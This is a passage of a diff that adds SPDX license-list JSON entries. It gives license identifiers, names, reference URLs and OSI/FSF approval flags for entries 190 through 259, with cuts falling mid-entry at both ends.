+ "reference": "https://spdx.org/licenses/Apache-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Apache-1.1.json",
+ "referenceNumber": 190,
+ "name": "Apache License 1.1",
+ "licenseId": "Apache-1.1",
+ "seeAlso": [
+ "http://apache.org/licenses/LICENSE-1.1",
+ "https://opensource.org/licenses/Apache-1.1"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-ND-4.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-4.0.json",
+ "referenceNumber": 191,
+ "name": "Creative Commons Attribution No Derivatives 4.0 International",
+ "licenseId": "CC-BY-ND-4.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nd/4.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/FreeBSD-DOC.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/FreeBSD-DOC.json",
+ "referenceNumber": 192,
+ "name": "FreeBSD Documentation License",
+ "licenseId": "FreeBSD-DOC",
+ "seeAlso": [
+ "https://www.freebsd.org/copyright/freebsd-doc-license/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SCEA.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SCEA.json",
+ "referenceNumber": 193,
+ "name": "SCEA Shared Source License",
+ "licenseId": "SCEA",
+ "seeAlso": [
+ "http://research.scea.com/scea_shared_source_license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Latex2e.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Latex2e.json",
+ "referenceNumber": 194,
+ "name": "Latex2e License",
+ "licenseId": "Latex2e",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Latex2e"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Artistic-1.0-cl8.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Artistic-1.0-cl8.json",
+ "referenceNumber": 195,
+ "name": "Artistic License 1.0 w/clause 8",
+ "licenseId": "Artistic-1.0-cl8",
+ "seeAlso": [
+ "https://opensource.org/licenses/Artistic-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/SGI-B-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SGI-B-1.1.json",
+ "referenceNumber": 196,
+ "name": "SGI Free Software License B v1.1",
+ "licenseId": "SGI-B-1.1",
+ "seeAlso": [
+ "http://oss.sgi.com/projects/FreeB/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/NRL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NRL.json",
+ "referenceNumber": 197,
+ "name": "NRL License",
+ "licenseId": "NRL",
+ "seeAlso": [
+ "http://web.mit.edu/network/isakmp/nrllicense.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SWL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SWL.json",
+ "referenceNumber": 198,
+ "name": "Scheme Widget Library (SWL) Software License Agreement",
+ "licenseId": "SWL",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/SWL"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Zed.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Zed.json",
+ "referenceNumber": 199,
+ "name": "Zed License",
+ "licenseId": "Zed",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Zed"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CERN-OHL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CERN-OHL-1.1.json",
+ "referenceNumber": 200,
+ "name": "CERN Open Hardware Licence v1.1",
+ "licenseId": "CERN-OHL-1.1",
+ "seeAlso": [
+ "https://www.ohwr.org/project/licenses/wikis/cern-ohl-v1.1"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/RHeCos-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/RHeCos-1.1.json",
+ "referenceNumber": 201,
+ "name": "Red Hat eCos Public License v1.1",
+ "licenseId": "RHeCos-1.1",
+ "seeAlso": [
+ "http://ecos.sourceware.org/old-license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/JasPer-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/JasPer-2.0.json",
+ "referenceNumber": 202,
+ "name": "JasPer License",
+ "licenseId": "JasPer-2.0",
+ "seeAlso": [
+ "http://www.ece.uvic.ca/~mdadams/jasper/LICENSE"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SSPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SSPL-1.0.json",
+ "referenceNumber": 203,
+ "name": "Server Side Public License, v 1",
+ "licenseId": "SSPL-1.0",
+ "seeAlso": [
+ "https://www.mongodb.com/licensing/server-side-public-license"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-2.0+.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-2.0+.json",
+ "referenceNumber": 204,
+ "name": "GNU General Public License v2.0 or later",
+ "licenseId": "GPL-2.0+",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html",
+ "https://opensource.org/licenses/GPL-2.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-1.4.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-1.4.json",
+ "referenceNumber": 205,
+ "name": "Open LDAP Public License v1.4",
+ "licenseId": "OLDAP-1.4",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003dc9f95c2f3f2ffb5e0ae55fe7388af75547660941"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/libpng-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/libpng-2.0.json",
+ "referenceNumber": 206,
+ "name": "PNG Reference Library version 2",
+ "licenseId": "libpng-2.0",
+ "seeAlso": [
+ "http://www.libpng.org/pub/png/src/libpng-LICENSE.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CNRI-Python-GPL-Compatible.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CNRI-Python-GPL-Compatible.json",
+ "referenceNumber": 207,
+ "name": "CNRI Python Open Source GPL Compatible License Agreement",
+ "licenseId": "CNRI-Python-GPL-Compatible",
+ "seeAlso": [
+ "http://www.python.org/download/releases/1.6.1/download_win/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Aladdin.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Aladdin.json",
+ "referenceNumber": 208,
+ "name": "Aladdin Free Public License",
+ "licenseId": "Aladdin",
+ "seeAlso": [
+ "http://pages.cs.wisc.edu/~ghost/doc/AFPL/6.01/Public.htm"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CECILL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CECILL-1.0.json",
+ "referenceNumber": 209,
+ "name": "CeCILL Free Software License Agreement v1.0",
+ "licenseId": "CECILL-1.0",
+ "seeAlso": [
+ "http://www.cecill.info/licences/Licence_CeCILL_V1-fr.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Ruby.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Ruby.json",
+ "referenceNumber": 210,
+ "name": "Ruby License",
+ "licenseId": "Ruby",
+ "seeAlso": [
+ "http://www.ruby-lang.org/en/LICENSE.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/NPL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NPL-1.1.json",
+ "referenceNumber": 211,
+ "name": "Netscape Public License v1.1",
+ "licenseId": "NPL-1.1",
+ "seeAlso": [
+ "http://www.mozilla.org/MPL/NPL/1.1/"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/ImageMagick.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ImageMagick.json",
+ "referenceNumber": 212,
+ "name": "ImageMagick License",
+ "licenseId": "ImageMagick",
+ "seeAlso": [
+ "http://www.imagemagick.org/script/license.php"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Cube.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Cube.json",
+ "referenceNumber": 213,
+ "name": "Cube License",
+ "licenseId": "Cube",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Cube"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.1-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-only.json",
+ "referenceNumber": 214,
+ "name": "GNU Free Documentation License v1.1 only",
+ "licenseId": "GFDL-1.1-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-2.0.json",
+ "referenceNumber": 215,
+ "name": "Creative Commons Attribution 2.0 Generic",
+ "licenseId": "CC-BY-2.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by/2.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AFL-1.2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AFL-1.2.json",
+ "referenceNumber": 216,
+ "name": "Academic Free License v1.2",
+ "licenseId": "AFL-1.2",
+ "seeAlso": [
+ "http://opensource.linux-mirror.org/licenses/afl-1.2.txt",
+ "http://wayback.archive.org/web/20021204204652/http://www.opensource.org/licenses/academic.php"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-SA-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-2.0.json",
+ "referenceNumber": 217,
+ "name": "Creative Commons Attribution Share Alike 2.0 Generic",
+ "licenseId": "CC-BY-SA-2.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-sa/2.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CECILL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CECILL-2.0.json",
+ "referenceNumber": 218,
+ "name": "CeCILL Free Software License Agreement v2.0",
+ "licenseId": "CECILL-2.0",
+ "seeAlso": [
+ "http://www.cecill.info/licences/Licence_CeCILL_V2-en.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MIT-advertising.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MIT-advertising.json",
+ "referenceNumber": 219,
+ "name": "Enlightenment License (e16)",
+ "licenseId": "MIT-advertising",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/MIT_With_Advertising"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-SA-2.5.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-2.5.json",
+ "referenceNumber": 220,
+ "name": "Creative Commons Attribution Non Commercial Share Alike 2.5 Generic",
+ "licenseId": "CC-BY-NC-SA-2.5",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-sa/2.5/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Artistic-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Artistic-1.0.json",
+ "referenceNumber": 221,
+ "name": "Artistic License 1.0",
+ "licenseId": "Artistic-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/Artistic-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OSL-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OSL-3.0.json",
+ "referenceNumber": 222,
+ "name": "Open Software License 3.0",
+ "licenseId": "OSL-3.0",
+ "seeAlso": [
+ "https://web.archive.org/web/20120101081418/http://rosenlaw.com:80/OSL3.0.htm",
+ "https://opensource.org/licenses/OSL-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/X11.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/X11.json",
+ "referenceNumber": 223,
+ "name": "X11 License",
+ "licenseId": "X11",
+ "seeAlso": [
+ "http://www.xfree86.org/3.3.6/COPYRIGHT2.html#3"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Bahyph.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Bahyph.json",
+ "referenceNumber": 224,
+ "name": "Bahyph License",
+ "licenseId": "Bahyph",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Bahyph"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.0.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.0.1.json",
+ "referenceNumber": 225,
+ "name": "Open LDAP Public License v2.0.1",
+ "licenseId": "OLDAP-2.0.1",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003db6d68acd14e51ca3aab4428bf26522aa74873f0e"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/EUDatagrid.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/EUDatagrid.json",
+ "referenceNumber": 226,
+ "name": "EU DataGrid Software License",
+ "licenseId": "EUDatagrid",
+ "seeAlso": [
+ "http://eu-datagrid.web.cern.ch/eu-datagrid/license.html",
+ "https://opensource.org/licenses/EUDatagrid"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MTLL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MTLL.json",
+ "referenceNumber": 227,
+ "name": "Matrix Template Library License",
+ "licenseId": "MTLL",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Matrix_Template_Library_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.2-invariants-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-invariants-only.json",
+ "referenceNumber": 228,
+ "name": "GNU Free Documentation License v1.2 only - invariants",
+ "licenseId": "GFDL-1.2-invariants-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.3-no-invariants-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-no-invariants-or-later.json",
+ "referenceNumber": 229,
+ "name": "GNU Free Documentation License v1.3 or later - no invariants",
+ "licenseId": "GFDL-1.3-no-invariants-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/fdl-1.3.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/curl.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/curl.json",
+ "referenceNumber": 230,
+ "name": "curl License",
+ "licenseId": "curl",
+ "seeAlso": [
+ "https://github.com/bagder/curl/blob/master/COPYING"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LAL-1.3.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LAL-1.3.json",
+ "referenceNumber": 231,
+ "name": "Licence Art Libre 1.3",
+ "licenseId": "LAL-1.3",
+ "seeAlso": [
+ "https://artlibre.org/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/DSDP.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/DSDP.json",
+ "referenceNumber": 232,
+ "name": "DSDP License",
+ "licenseId": "DSDP",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/DSDP"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CERN-OHL-1.2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CERN-OHL-1.2.json",
+ "referenceNumber": 233,
+ "name": "CERN Open Hardware Licence v1.2",
+ "licenseId": "CERN-OHL-1.2",
+ "seeAlso": [
+ "https://www.ohwr.org/project/licenses/wikis/cern-ohl-v1.2"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/TOSL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/TOSL.json",
+ "referenceNumber": 234,
+ "name": "Trusster Open Source License",
+ "licenseId": "TOSL",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/TOSL"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-3.0-with-autoconf-exception.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-3.0-with-autoconf-exception.json",
+ "referenceNumber": 235,
+ "name": "GNU General Public License v3.0 w/Autoconf exception",
+ "licenseId": "GPL-3.0-with-autoconf-exception",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/autoconf-exception-3.0.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-3.0.json",
+ "referenceNumber": 236,
+ "name": "Creative Commons Attribution 3.0 Unported",
+ "licenseId": "CC-BY-3.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by/3.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Qhull.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Qhull.json",
+ "referenceNumber": 237,
+ "name": "Qhull License",
+ "licenseId": "Qhull",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Qhull"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.3-no-invariants-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-no-invariants-only.json",
+ "referenceNumber": 238,
+ "name": "GNU Free Documentation License v1.3 only - no invariants",
+ "licenseId": "GFDL-1.3-no-invariants-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/fdl-1.3.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/TORQUE-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/TORQUE-1.1.json",
+ "referenceNumber": 239,
+ "name": "TORQUE v2.5+ Software License v1.1",
+ "licenseId": "TORQUE-1.1",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/TORQUEv1.1"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/MS-PL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MS-PL.json",
+ "referenceNumber": 240,
+ "name": "Microsoft Public License",
+ "licenseId": "MS-PL",
+ "seeAlso": [
+ "http://www.microsoft.com/opensource/licenses.mspx",
+ "https://opensource.org/licenses/MS-PL"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Apache-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Apache-1.0.json",
+ "referenceNumber": 241,
+ "name": "Apache License 1.0",
+ "licenseId": "Apache-1.0",
+ "seeAlso": [
+ "http://www.apache.org/licenses/LICENSE-1.0"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/copyleft-next-0.3.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/copyleft-next-0.3.1.json",
+ "referenceNumber": 242,
+ "name": "copyleft-next 0.3.1",
+ "licenseId": "copyleft-next-0.3.1",
+ "seeAlso": [
+ "https://github.com/copyleft-next/copyleft-next/blob/master/Releases/copyleft-next-0.3.1"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.2-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-or-later.json",
+ "referenceNumber": 243,
+ "name": "GNU Free Documentation License v1.2 or later",
+ "licenseId": "GFDL-1.2-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-3.0+.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-3.0+.json",
+ "referenceNumber": 244,
+ "name": "GNU General Public License v3.0 or later",
+ "licenseId": "GPL-3.0+",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/gpl-3.0-standalone.html",
+ "https://opensource.org/licenses/GPL-3.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MulanPSL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MulanPSL-2.0.json",
+ "referenceNumber": 245,
+ "name": "Mulan Permissive Software License, Version 2",
+ "licenseId": "MulanPSL-2.0",
+ "seeAlso": [
+ "https://license.coscl.org.cn/MulanPSL2/"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/FSFAP.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/FSFAP.json",
+ "referenceNumber": 246,
+ "name": "FSF All Permissive License",
+ "licenseId": "FSFAP",
+ "seeAlso": [
+ "https://www.gnu.org/prep/maintain/html_node/License-Notices-for-Other-Files.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Xerox.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Xerox.json",
+ "referenceNumber": 247,
+ "name": "Xerox License",
+ "licenseId": "Xerox",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Xerox"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CDDL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CDDL-1.0.json",
+ "referenceNumber": 248,
+ "name": "Common Development and Distribution License 1.0",
+ "licenseId": "CDDL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/cddl1"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.3-invariants-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-invariants-only.json",
+ "referenceNumber": 249,
+ "name": "GNU Free Documentation License v1.3 only - invariants",
+ "licenseId": "GFDL-1.3-invariants-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/fdl-1.3.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/etalab-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/etalab-2.0.json",
+ "referenceNumber": 250,
+ "name": "Etalab Open License 2.0",
+ "licenseId": "etalab-2.0",
+ "seeAlso": [
+ "https://github.com/DISIC/politique-de-contribution-open-source/blob/master/LICENSE.pdf",
+ "https://raw.githubusercontent.com/DISIC/politique-de-contribution-open-source/master/LICENSE"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/XFree86-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/XFree86-1.1.json",
+ "referenceNumber": 251,
+ "name": "XFree86 License 1.1",
+ "licenseId": "XFree86-1.1",
+ "seeAlso": [
+ "http://www.xfree86.org/current/LICENSE4.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/SNIA.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SNIA.json",
+ "referenceNumber": 252,
+ "name": "SNIA Public License 1.1",
+ "licenseId": "SNIA",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/SNIA_Public_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LPPL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LPPL-1.1.json",
+ "referenceNumber": 253,
+ "name": "LaTeX Project Public License v1.1",
+ "licenseId": "LPPL-1.1",
+ "seeAlso": [
+ "http://www.latex-project.org/lppl/lppl-1-1.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CATOSL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CATOSL-1.1.json",
+ "referenceNumber": 254,
+ "name": "Computer Associates Trusted Open Source License 1.1",
+ "licenseId": "CATOSL-1.1",
+ "seeAlso": [
+ "https://opensource.org/licenses/CATOSL-1.1"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/TU-Berlin-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/TU-Berlin-2.0.json",
+ "referenceNumber": 255,
+ "name": "Technische Universitaet Berlin License 2.0",
+ "licenseId": "TU-Berlin-2.0",
+ "seeAlso": [
+ "https://github.com/CorsixTH/deps/blob/fd339a9f526d1d9c9f01ccf39e438a015da50035/licences/libgsm.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.3.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.3.json",
+ "referenceNumber": 256,
+ "name": "GNU Free Documentation License v1.3",
+ "licenseId": "GFDL-1.3",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/fdl-1.3.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.3-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-or-later.json",
+ "referenceNumber": 257,
+ "name": "GNU Free Documentation License v1.3 or later",
+ "licenseId": "GFDL-1.3-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/fdl-1.3.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/LAL-1.2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LAL-1.2.json",
+ "referenceNumber": 258,
+ "name": "Licence Art Libre 1.2",
+ "licenseId": "LAL-1.2",
+ "seeAlso": [
+ "http://artlibre.org/licence/lal/licence-art-libre-12/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/ICU.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ICU.json",
+ "referenceNumber": 259,
